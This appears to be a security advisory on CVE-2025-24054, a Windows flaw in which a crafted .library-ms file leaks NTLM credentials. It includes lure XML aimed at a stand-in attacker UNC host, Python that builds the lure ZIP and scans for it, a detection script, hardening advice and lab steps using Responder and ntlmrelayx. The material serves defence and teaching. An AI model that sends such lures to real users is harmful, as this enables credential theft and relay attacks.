Windows NTLM hash disclosure/relay vulnerability CVE-2025-24054 abuses how Windows Explorer handles a specially crafted Windows Library description file (.library-ms). When a user opens or imports a .library-ms file (delivered as an email attachment, on a USB drive, or downloaded from an untrusted website), Explorer automatically attempts to connect to the UNC path specified in the file's XML.
That connection triggers an NTLM authentication exchange with the attacker's server, which exposes the user's Net-NTLMv2 response (a challenge-response value derived from the user's password hash; hosts still configured for LM compatibility levels 0-2 send the far weaker NTLMv1 response instead). This is not the password and not a pass-the-hash NT hash: the attacker either cracks the response offline to recover the password, or relays the live authentication in real time to another server in the same domain that still accepts NTLM.
The proof-of-concept (PoC) script created by Beatriz Fresno Naumova and dated October 6, 2025, generates a minimal but functional .library-ms file and wraps it in a ZIP archive. It is written for red-team testing and proof-of-concept demonstrations, not as a weaponised tool.
Exploit Explanation (Steps)
1. Create a minimal XML file that follows the Windows Library description schema; the only element that matters is the <url> inside <simpleLocation>, which Explorer treats as a location to enumerate:
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\attacker-ip\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
2. Save it as something.library-ms and compress it into a ZIP archive (many mail filters reject a bare .library-ms attachment; a ZIP usually passes).
3. When the victim extracts the ZIP and opens the .library-ms file (or imports it via "Add a Location" in Explorer), Windows will:
a) Parse the XML.
b) Attempt to enumerate/connect to the UNC path it found.
c) Send an NTLM NEGOTIATE message to that host; the attacker's server answers with a CHALLENGE containing a server challenge of its choosing, and the client replies with an AUTHENTICATE message that carries the Net-NTLMv2 response, which the attacker records.
Check Point's analysis of the campaigns seen in the wild found that even less interaction can suffice: extracting the archive, or merely browsing to the folder so that Explorer renders the file, was enough to trigger the connection.
4. No code execution or privilege escalation occurs on the victim machine; the impact is the disclosure of authentication material.
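The lure and a matching check, as an added example that is not the PoC the page describes: build the minimal .library-ms in memory, wrap it in a ZIP as step 2 says, then scan the archive the way a mail gateway or a triage script could, flagging any library whose location is a UNC path or URL rather than a local folder. The attacker address 203.0.113.10 is a documentation range, chosen so that nothing here touches the network; the file name, share name and helper names are assumptions.

```python
"""Build a .library-ms lure (in memory) and scan ZIP attachments for one.
Added example, not the page's PoC; all values are constructed for the demo."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = "{http://schemas.microsoft.com/windows/2009/library}"
ATTACKER_UNC = r"\\203.0.113.10\shared"  # constructed (TEST-NET-3), not a real listener


def build_library_ms(unc_path: str) -> bytes:
    """Minimal Library description whose search connector points at a UNC path."""
    xml = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">\n'
        "  <searchConnectorDescriptionList>\n"
        "    <searchConnectorDescription>\n"
        "      <simpleLocation>\n"
        f"        <url>{escape(unc_path)}</url>\n"
        "      </simpleLocation>\n"
        "    </searchConnectorDescription>\n"
        "  </searchConnectorDescriptionList>\n"
        "</libraryDescription>\n"
    )
    return xml.encode("utf-8")


def build_zip(name: str, unc_path: str) -> bytes:
    """Step 2 of the page: wrap <name>.library-ms in a ZIP so mail filters let it through."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{name}.library-ms", build_library_ms(unc_path))
    return buf.getvalue()


# Anything Explorer would resolve over the network: UNC (\\host or //host), HTTP(S), file://
REMOTE_URL = re.compile(r"^(\\\\|//|https?://|file://)", re.IGNORECASE)


def library_targets(data: bytes) -> list:
    """Every <url> in a Library description, namespace-qualified so a renamed element is not missed."""
    root = ET.fromstring(data)
    return [u.text.strip() for u in root.iter(NS + "url") if u.text]


def is_remote(target: str) -> bool:
    return bool(REMOTE_URL.match(target))


def scan_zip(zip_bytes: bytes) -> list:
    """Return (member name, target) for each .library-ms whose location is remote.
    A member that is not well-formed XML is reported too: Explorer will not parse it, but a
    deliberately odd file is still worth a look."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".library-ms"):
                continue
            try:
                targets = library_targets(zf.read(info.filename))
            except ET.ParseError:
                findings.append((info.filename, "<unparseable XML>"))
                continue
            findings.extend((info.filename, t) for t in targets if is_remote(t))
    return findings


if __name__ == "__main__":
    for member, target in scan_zip(build_zip("test", ATTACKER_UNC)):
        print(f"{member}: remote library location {target}")
```

The scanner flags every network location, including legitimate intranet shares, so in production you would allow-list your own file-server names before alerting. Note that a WebDAV path such as \\host@80\share also begins with two backslashes and is caught by the same rule.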
Real-World Impact
1. Relay is possible wherever NTLM is still accepted without signing or channel binding: SMB file shares that do not require signing, LDAP/LDAPS on domain controllers without signing and channel binding, and HTTP endpoints such as older Exchange servers and AD CS web enrollment (the ESC8 path). NTLMv1 responses are worse still: with an attacker-chosen fixed server challenge they can be turned back into the NT hash with precomputed tables, which then works for pass-the-hash.
2. Net-NTLMv2 responses cannot be replayed as a hash, but they can be cracked offline (hashcat mode 5600) at billions of candidates per second on modern GPU hardware, so weak, guessable, or reused passwords fall quickly.
3. High-value targets include domain administrators, service accounts, and any user with access to sensitive shared resources.
4. Delivery methods include spear-phishing with the ZIP attached (by far the most common), watering-hole sites hosting the ZIP, and malicious documents carrying OLE objects that point back to the library file.
Microsoft addressed CVE-2025-24054 in its March 2025 security updates, and later 2025 cumulative updates (KB5044284 and subsequent releases) changed how Explorer handles untrusted library files, with additional blocking and clearer warnings.
That fix is specific to .library-ms handling. Authenticating with NTLM to whatever UNC path Windows is pointed at is intended behaviour and is unchanged, so a fully patched system still gives up a Net-NTLMv2 response through other lures (.lnk, .url, .scf, Office documents with remote templates) if a user can be induced to open them, and unpatched or out-of-support hosts remain exposed to the .library-ms path itself.
Best Practices for hardening and mitigating attacks
1. Disable outgoing NTLM wherever you can: set the Group Policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to Deny all (registry value RestrictSendingNTLMTraffic = 2 under HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0). Start with Audit all (value 1), review the resulting events in the NTLM Operational log (Event ID 8001 records outgoing NTLM), move the applications that still need NTLM to the "Add remote server exceptions for NTLM authentication" list, and only then switch to Deny. With this in place the victim never sends an AUTHENTICATE message to the attacker's server at all.
2. Require SMB signing on both client and server (Windows 11 24H2 enforces it by default); this blocks SMB relay. The other relay targets need their own controls: LDAP signing and channel binding on domain controllers, and Extended Protection for Authentication on IIS-hosted services such as AD CS web enrollment and Exchange.
3. On the domain controllers, set "Network security: Restrict NTLM: NTLM authentication in this domain" to Deny all domain accounts, again after an audit phase, so that relayed or cracked domain credentials are not accepted over NTLM anywhere in the domain.
4. Block outbound SMB (TCP 445 and 139) from workstations to the Internet at the perimeter firewall. Most campaigns stage the listener on an external host, so this alone stops the leak in the common case; also disable the WebClient service on hosts that do not need it, because Windows retries a blocked UNC path over WebDAV (HTTP) when that service is running.
5. Endpoint hardening: the Microsoft Defender Attack Surface Reduction rules "Block Win32 API calls from Office macros" and "Block executable content from email client and webmail", together with AppLocker/WDAC rules that deny execution from %TEMP% and the Downloads folder, limit what a follow-on payload can do. They do not stop the hash leak itself, because the trigger is Explorer parsing the file rather than any code running; for that, have the mail gateway quarantine .library-ms files, including inside ZIP archives.
6. User education: treat .library-ms files, and any ZIP containing one, with the same suspicion as .lnk or .scf files.
7. Monitor network traffic: alert on SMB (TCP 445) connections from workstations to unknown or external IPs, and on WebClient (WebDAV) traffic to external hosts; an NTLMSSP NEGOTIATE message inside such a connection is a strong indicator that a lure has fired.
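Detection for the monitoring item, as an added example that is not from the page: it parses Windows Firewall log lines (the pfirewall.log layout, whose "#Fields:" header names the columns) and reports outbound SMB from workstations to addresses outside the organisation's own ranges, whether the connection was allowed or dropped, since a dropped attempt still means a lure was opened. The log lines, the host addresses and the internal ranges are constructed; the IP 203.0.113.10 is a documentation address standing in for an attacker listener.

```python
"""Flag outbound SMB to external hosts in Windows Firewall log lines.
Added example; SAMPLE_LOG and INTERNAL_NETS are constructed for the demo."""
import ipaddress

# Constructed pfirewall.log excerpt: one workstation (10.0.5.23) talks SMB to an internal
# server, then to an external host twice (once allowed, once dropped), then HTTPS to the
# same host; the last row is inbound and must not be reported.
SAMPLE_LOG = """\
#Version: 1.5
#Software: Microsoft Windows Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2025-04-17 09:12:01 ALLOW TCP 10.0.5.23 10.0.1.5 51233 445 0 - 0 0 0 - - - SEND
2025-04-17 09:12:04 ALLOW TCP 10.0.5.23 203.0.113.10 51234 445 0 - 0 0 0 - - - SEND
2025-04-17 09:12:06 DROP TCP 10.0.5.23 203.0.113.10 51235 445 0 - 0 0 0 - - - SEND
2025-04-17 09:12:09 ALLOW TCP 10.0.5.23 203.0.113.10 51236 443 0 - 0 0 0 - - - SEND
2025-04-17 09:13:00 ALLOW TCP 198.51.100.7 10.0.5.23 40000 445 0 - 0 0 0 - - - RECEIVE
"""

SMB_PORTS = {445, 139}

# Your own address space. Listed explicitly rather than via ipaddress.is_private, which also
# treats documentation ranges such as 203.0.113.0/24 as private and would hide the demo hit.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16",
)]


def parse_firewall_log(text: str):
    """Yield one dict per data row, keyed by the column names from the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # truncated or malformed row; production code would count these
        yield dict(zip(fields, parts))


def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def find_smb_egress(text: str) -> list:
    """(time, action, src, dst, port) for each outbound SMB connection to an external address."""
    hits = []
    for row in parse_firewall_log(text):
        if row["path"] != "SEND" or row["protocol"] != "TCP":
            continue
        port = int(row["dst-port"])
        if port in SMB_PORTS and is_external(row["dst-ip"]):
            hits.append((row["time"], row["action"], row["src-ip"], row["dst-ip"], port))
    return hits


if __name__ == "__main__":
    for time, action, src, dst, port in find_smb_egress(SAMPLE_LOG):
        print(f"{time} {action:5} {src} -> {dst}:{port}  possible NTLM leak")
```

The same logic ports directly to Sysmon Event ID 3 or NetFlow data; the part worth keeping is the explicit internal-range list and the decision to report DROP rows, which tell you which user opened the lure even when the perimeter block worked.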
Quick Test (Lab Only)
1. Point the PoC at the IP of your own listener (for example: `python3 poc.py -f test -t 192.168.1.100 -z evil.zip`).
2. Send the resulting ZIP to yourself by email or over a file share.
3. Open the ZIP on a Windows 10 or 11 test system.
4. Run Responder on the listener to capture the Net-NTLMv2 response, or Impacket's ntlmrelayx to relay it to a target in the lab.
This behaviour remains exploitable in many enterprise environments worldwide, particularly where legacy corporate applications require NTLM or allow NTLM fallback. The technique is low-noise and high-reward, and it remains popular with professional red teams and financially motivated criminals alike.
Source: Exploit DB
© 2016 - 2026 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067